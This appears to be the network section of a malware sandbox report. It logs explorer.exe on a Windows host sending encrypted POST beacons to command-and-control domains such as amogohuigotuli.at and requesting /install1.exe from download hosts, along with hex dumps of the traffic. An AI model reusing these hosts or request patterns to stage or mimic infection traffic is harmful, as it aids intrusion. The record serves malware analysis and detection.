Jan 9, 2022 18:48:25.129724026 CET	11996	IN	Data Raw: 2f f5 f8 d4 a6 0e 57 3e 73 0a 52 0d 5e 70 ab 71 15 13 63 89 b0 47 8f df 3b eb 39 cc 9b 9b 7a 06 0c 81 13 18 d3 67 5c 88 db b3 18 22 a6 b2 3d 2d 01 e3 38 8c 3e 7d 01 ab 29 a7 0b e5 95 cd 44 31 57 cc 20 53 87 d4 5d 1d f6 b4 47 8e 5b 3c 12 d6 d0 dd Data Ascii: /W>sR^pqcG;9zg\"=-8>})D1W S]G[<<'FuI'bnL+0jRa:R7"t[K"p3{Hf=UsA/m\P1{b(>9V{w I=RHnXVSc
Jan 9, 2022 18:48:25.129762888 CET	11997	IN	Data Raw: d9 2f 57 3c 72 9a 8f ee 1c 5d 06 fa 5a e1 a8 b0 2e 37 8d 4b b5 62 f1 a4 69 4d 2d e9 a2 5b 90 ed be 74 5f 28 8b ca c9 60 02 7b b3 45 62 6c dd 84 7e c6 a7 2f 26 9e 7a 04 e4 41 9c 6a a4 bd 35 05 ad 31 0e c0 73 f8 50 9f ce aa c9 fc 6d d5 4e 47 67 e2 Data Ascii: /W<r]Z.7KbiM-[t_(`{Ebl~/&zAj51sPmNGgy>Vm+._Pw3v/$a#>ow15QaUJ=vp~fmFzD@w*TL:o<d:bc6h5$:w%mqS;?3dDgnCtc5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.3	49845	148.0.74.229	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:27.673799992 CET	12242	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pyemedcg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: amogohuigotuli.at
Jan 9, 2022 18:48:27.673846006 CET	12242	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 ee a1 2f d8 Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bO/&>`_q/g>oD@6v#hUv)vp/zs$?[K;Qd20rai1LLuoCk^^QZ1<f@%W4
Jan 9, 2022 18:48:28.257843971 CET	12244	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:27 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 f9 3a 6b d4 0d 1a 40 10 12 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 60 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8e e2 e3 09 88 30 08 9e 3b f8 4e 2f 9d a7 35 93 7d c1 6b 66 5d 2e 3b 1b 8e be d2 0b 10 cc 30 4f 55 18 24 66 53 54 7d 08 d4 05 cd f1 36 58 4b c1 66 2f d2 ab 89 14 f0 28 71 9e 7e 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 78 8d 55 db c4 0d 13 13 bf 1e e1 92 24 08 4f c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 01 28 2b 77 33 c3 00 45 3d 79 24 0d 1e eb 67 f9 7d d8 ef fe cd f0 a8 01 3f 26 58 c5 07 1f ad d6 46 43 7c 20 4b b2 cf dd a9 8c 29 02 3d 89 31 99 a5 13 01 6e 01 2e 10 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55 0c e3 56 f6 a8 b4 f3 5b 11 8f 41 bd 0a 29 78 87 9b 68 ca 4b c2 7b 28 b0 cf bb 66 56 9a 3c 5c e3 9c 17 6b 18 67 cd d2 f3 bb 75 e0 91 ce Data Ascii: :k@0O}q4`IJ%9Wd8IkDJ8P>0;N/5}kf].;0OU$fST}6XKf/(q~yShGjT05sq733hsE\|WD<P5Q"f=(jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{~ExU$Oa~i~_DzN,%Qa>\|(HkJ{/a]F4l3l)\|~qhJO;yLuVW;r#u1yr+Lc1<'i3FHU=hU@Wd{9f(B@w=fd0QpKk^NTUo)2([T&}WL\h),^[}tyPmCbz+z(Fzk7 RH:M?~Mpvn%.5_)CCUb:@3%}/#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=(+w3E=y$g}?&XFC\| K)=1n.rG)"@BoUV[A)xhK{(fV<\kgu
Jan 9, 2022 18:48:28.257905960 CET	12245	IN	Data Raw: e0 ae 08 4b 84 6e 25 2f 74 4d ab 61 98 4b 24 5b cc ba 0f 14 78 c5 8a d3 0e 3a 03 2a 79 2b 0d 8f 3d ef a2 86 89 f5 11 dc 4f 59 9a 5b 85 5c 42 41 eb 60 fa 12 37 8e dd 28 81 41 78 3d 65 43 32 c0 36 6d c1 db dc d1 29 20 4d 9d 15 ac 25 63 6f 7d 54 5a Data Ascii: Kn%/tMaK$[x:*y+=OY[\BA`7(Ax=eC26m) M%co}TZ>2\A/pG<C4,um\og~$zX9;67=74J!YAPG6/<C1t7RJu!]P\0=Ef1
Jan 9, 2022 18:48:28.257947922 CET	12246	IN	Data Raw: 5d ae aa 76 78 bf f3 a2 1f 43 6a 4b 13 61 b9 8e 03 f9 60 69 cc 17 13 00 b1 89 5c ec d4 1c 44 23 07 df 6b 38 5e df b0 2a f8 c3 0e 9f bc 5d fb ba 8d 6d 19 ff 43 07 a2 76 bf f9 32 0f 43 a8 d0 c8 38 a3 b8 c1 6b 53 cd 2a 1d 2d 60 22 69 4b 9e 36 c6 b9 Data Ascii: ]vxCjKa`i\D#k8^]mCv2C8kS-`"iK6@L7$';s2}Hah#5VhEH hatw-s="R#.H5zKBNc-;g4L^^^H#n8?*C;]7FMS1`
Jan 9, 2022 18:48:28.257987976 CET	12248	IN	Data Raw: 47 22 aa ab a1 1a 5e 4a 11 2e 3f 00 bd 78 6e 39 d0 74 f9 ab f5 ac 0e 2c aa e2 6f 66 fc f8 3f 56 fe 96 6b 69 42 17 e0 1d 7e 10 50 9e 32 ac dc 00 8b 66 3d 15 63 ca 68 69 cc c7 00 e8 30 36 5e c5 77 61 4b d2 d8 3d d7 af 31 7b 12 23 fc 5b 7d 00 4e 4f Data Ascii: G"^J.?xn9t,of?VkiB~P2f=chi06^waK=1{#[}NO-SOLxVAd}jZ#D^,p1 O5/G\|&<9UG7RJ64A>k`}yeMdb26lP:W6d.5u\{\@qecSN
Jan 9, 2022 18:48:28.422853947 CET	12249	IN	Data Raw: 5b 00 bf 98 16 0f 62 b0 d8 d1 97 4b 33 37 ca 44 bf fb 5a 5f 82 0b 67 fc da 20 6b 70 cd 7c 91 3a 87 78 1d 58 0d 7b c7 2f 09 1a 4e ef 26 fd a7 2a 1d 47 8e 44 5e 5b 9a 9e 74 0f 41 b3 c2 cb d5 40 8a 6a 4f b0 ad ba 25 1f b7 b8 05 db 6e 86 03 db 18 1b Data Ascii: [bK37DZ_g kp\|:xX{/N&GD^[tA@jO%n=Yf>7%4,]71xb,%xg%E:rXpcxuu6s^VuEe?Ccjh,>64Of>uXu{)\MVS
Jan 9, 2022 18:48:28.422916889 CET	12250	IN	Data Raw: 31 e6 03 35 15 1f ca b6 5d 1c f1 2e 73 60 4c c2 44 b4 0c 30 6b 68 05 7d 86 ed 1d 3c 78 70 1f f5 7b 43 89 5d 15 f4 ed c3 98 57 0c d0 8b 7d 51 30 aa d8 56 77 b3 20 c4 48 5b 2e 54 75 f4 e8 1d 4c e0 21 a9 6c 3e 8a fe 4e e9 e3 06 50 71 6f c8 e1 d1 b7 Data Ascii: 15].s`LD0kh}<xp{C]W}Q0Vw H[.TuL!l>NPqoO:XhE!dpCrnl37I{u8j$/?vSf"@#n''-'HFk%g<-O1v/1kx~_3$E1NI0oD\|#U
Jan 9, 2022 18:48:28.422966003 CET	12252	IN	Data Raw: d0 7b 50 78 e7 55 ef d9 68 97 d0 b3 3f 9d 21 e7 39 94 59 56 5c 09 e4 c4 e6 5b 5e 88 94 84 67 c7 62 73 8b 23 6c 18 14 3b 4d 4f 8e 57 fc 1b ef a6 f6 3b c4 3b d9 4b 9e 23 84 e6 8e f2 6e cf fb 77 58 85 2f 68 9e 10 98 85 72 38 84 69 db 93 ba 3d 44 08 Data Ascii: {PxUh?!9YV\[^gbs#l;MOW;;K#nwX/hr8i=Dq<frlYQ56.hWyFDOC?U2AOatQNl)2Xy/4n];"u&-#>X> h. y-O-HP^O
Jan 9, 2022 18:48:28.423007011 CET	12253	IN	Data Raw: 54 52 fe eb 1a 14 ab 87 18 8e f5 5a 42 fa f2 3a b1 4b 64 09 52 64 62 14 b3 d7 38 6d 11 bd a0 e6 7f 0a 93 34 e0 5a 22 8f 92 4c 6c f6 da ef 52 c3 a6 63 6e 34 5f dd 93 fc b9 3e ba cc 0c f5 08 db 82 7a 6b fa f0 a0 79 c8 04 54 92 95 fd 38 05 f0 13 91 Data Ascii: TRZB:KdRdb8m4Z"LlRcn4_>zkyT8rxFq]V(jl3v-T,ZJ_Md!\|*L}B\|WZ7m:OXv0X9-N\|.q~R~>p~37;]Zr]a
Jan 9, 2022 18:48:28.423793077 CET	12255	IN	Data Raw: fe b9 a8 3e 60 69 98 77 9e cf 3a 9c 2c 37 db b2 ab 6f 71 9c c2 85 7e ba f1 e1 fc 90 1b 27 33 d3 11 fc c3 b0 ca 0b 06 c9 d6 b5 59 15 1a 90 af 06 b8 46 2f 2e 3d 3e 37 14 9a ae 90 8f 6d e7 81 09 a4 ad b1 39 b4 97 8f 05 bf 76 a3 29 0c 26 3e 73 c0 95 Data Ascii: >`iw:,7oq~'3YF/.=>7m9v)&>sG5m!hniGW\|+Ler%pd)RU_-h\rIk*@~s#Qfro<}JWxIyOOq;)dkNM:9q-3r5antQ@`
Jan 9, 2022 18:48:28.423834085 CET	12256	IN	Data Raw: 60 d5 82 94 bb 37 8d ee fb 01 24 b1 9c ee 21 65 8c 69 a7 1d 1e ac 8b e3 e8 eb f8 94 90 3e 1d 10 3a cf 7b 83 83 e5 3c 52 af 66 91 0c 18 34 8a bd f8 f3 ed dd cd d8 00 05 bf d1 d7 ce ce df f6 43 a7 a6 aa df 56 c5 fd 85 b5 32 ca c7 2f 1e 36 87 ba e1 Data Ascii: `7$!ei>:{<Rf4CV2/6c^Y3r\|O{ GO{Yw;EmD:(cw\pV,{#;Oi</o:wGDw8L-y(".~OC
Jan 9, 2022 18:48:28.423872948 CET	12257	IN	Data Raw: 67 42 b9 3c a4 d5 54 8d f6 0d 5d 0d 8e 49 6d 73 2d 8e 8d 62 d7 cd 7a e6 b6 ed 39 fe ac e9 17 15 c2 41 76 5d a9 be 2b 3d f2 c9 bf f7 02 7f 4b 80 a1 31 1b fa 68 52 0f 8e 2f 45 40 f0 9e 56 fc f6 0f 58 b5 34 0e d5 13 dc ef a4 f0 c8 bd 8f c8 c5 9b 09 Data Ascii: gB<T]Ims-bz9Av]+=K1hR/E@VX4q'<#W8xsI-4!k>'.TdDd_:0uB>+)uPUG+Fe2d/Mk Uc7eY#+\/LW-j2z?

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.3	49848	187.232.210.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:30.179505110 CET	12812	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bifhr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 364 Host: amogohuigotuli.at
Jan 9, 2022 18:48:30.179514885 CET	12813	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bb 8a 14 62 cd d6 4f 96 8d f3 08 cb Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bOzjfitv&L]}RUZE7'rd<{gL(Iins,kqe`\|V%0eQ*%bAo2<:%T5AeR vks
Jan 9, 2022 18:48:30.837789059 CET	12819	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:30 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 43 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 08 9b 18 d2 05 83 fb 4e b7 26 e1 65 4c 57 24 e4 67 08 68 dd 16 2c 13 7c Data Ascii: Uys/~(`:N&eLW$gh,\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.3	49849	54.38.220.85	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:30.971236944 CET	12820	OUT	GET /install1.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: unic11m.top
Jan 9, 2022 18:48:30.990859032 CET	12820	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 09 Jan 2022 17:47:16 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.3	49850	211.169.6.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:31.283220053 CET	12821	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ejorc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: amogohuigotuli.at
Jan 9, 2022 18:48:31.283230066 CET	12821	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b8 8a 14 62 cd d6 4f 96 90 e1 42 ec Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bOB&br6.0x`a4[U-^$2$.78bjeI+>N4ge
Jan 9, 2022 18:48:32.323358059 CET	12830	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:31 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 46 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 08 9b 18 d2 41 c2 fa 0f a2 2d bf 3e 4a 49 78 f9 68 17 70 8d 54 25 5a 37 d4 b5 81 Data Ascii: Uys/~(`:A->JIxhpT%Z7

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49746	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:37.664779902 CET	1060	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fxrkgvik.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 270 Host: host-data-coin-11.com
Jan 9, 2022 18:47:37.664803982 CET	1060	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4a db ad 12 Data Ascii: i;G~CE5i[nwmFu$f]dJ+m}3r\.J<8;Cnobo<iYB#,VD`_YI{D22BdDEs"[&fKKk'iZjEp[lI5:J*}<8
Jan 9, 2022 18:47:38.211246967 CET	1060	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.3	49853	54.38.220.85	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:32.408732891 CET	12831	OUT	GET /install1.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: unicupload.top
Jan 9, 2022 18:48:32.426717043 CET	12831	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 09 Jan 2022 17:47:18 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.3	49854	211.169.6.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:32.693598032 CET	12834	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kbxyk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 278 Host: amogohuigotuli.at
Jan 9, 2022 18:48:32.693628073 CET	12834	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b9 8a 14 62 cd d6 4f 96 fb d2 1b f4 Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bO6<$\|"&~ $6:D:M^6 <]qVBU5d4md1dY{k1y6S/KA<'vE1r[9"
Jan 9, 2022 18:48:33.998199940 CET	12836	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:33 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 0d 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 48 f0 94 bb 51 6f 82 d2 fd 3f 79 1e 21 ac a5 dd 10 f0 62 fc c5 92 48 d4 83 44 ea 5f 96 5c a3 1d b2 9f 11 6b b3 74 c7 6a c4 23 e9 12 85 5e c1 d0 e4 17 2a 50 d8 0d ad 06 c6 b2 fe f2 12 d5 4b 6d fd 69 c6 89 33 9d dd 7b ba 82 47 75 20 3e 89 fe 33 16 73 9f c5 49 c8 64 e4 24 f3 10 34 4a 9b 74 e3 33 06 15 a7 54 5b 2e 63 8b d2 3a 01 6c c3 7d bf fe 70 b0 cb 62 c2 05 a5 b8 11 54 a8 2e 67 d1 2a e4 36 b3 13 66 83 3d bf 1e e1 92 24 08 4f c5 53 e4 cb a1 2d 7f d8 f5 a4 c4 65 49 7e 5f af 9a a5 44 c9 a0 21 b9 df 7b 06 91 40 19 e0 7a 97 a9 18 ee f1 96 be 25 51 61 01 e0 3f 7c 88 38 c8 48 6b d1 c2 4a 9a 03 bd ec 9e ba 7b ac 87 2d bd 61 08 c0 5c bf 46 34 fd f8 17 6c 32 6c 29 7c 0a 8d c7 7d e3 0e a4 ef 7e 71 eb 80 f5 1a 6a 9b 0a 59 19 ae dc 4f 3b 69 82 ae 9c 97 12 4c 75 46 ad f3 57 3b 2a b9 62 ee cc 23 b2 88 0c 31 4d 92 90 f7 eb 08 ee e7 4e 2b 4c 80 d0 62 ff 13 b3 ce bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af bb de 55 b1 89 ba 68 f2 eb fd 9d 2b 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 95 bf 10 51 cc 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 2e a3 90 6e a3 54 55 51 7d b5 1b 6f c2 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 62 69 e0 67 a0 5c 68 91 55 7c 04 f1 2c 4e ae 03 5b b3 1d e4 a6 79 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 59 50 6d 23 e2 cb ef ea 95 03 7a d7 e8 11 c3 e0 2b d9 b6 bb 01 e0 17 28 d2 f4 44 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 44 94 26 29 c4 3a 96 bd 85 e4 17 3f cc e6 7e 4d b6 70 d4 03 1f ae 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 cf ac bd 3b 5a 43 43 68 55 03 62 18 5a 1b f8 40 a8 ae 88 c1 c0 a2 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e ec 36 ca 04 c1 6d 93 81 19 c3 57 b9 8c f5 68 91 52 b9 21 ea 9e 13 ee bb 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 58 79 53 64 11 2d 60 81 96 f3 fe 2e 27 9d 8f 3b 42 56 48 de 9e 73 e9 b5 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 be b1 8e da 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e 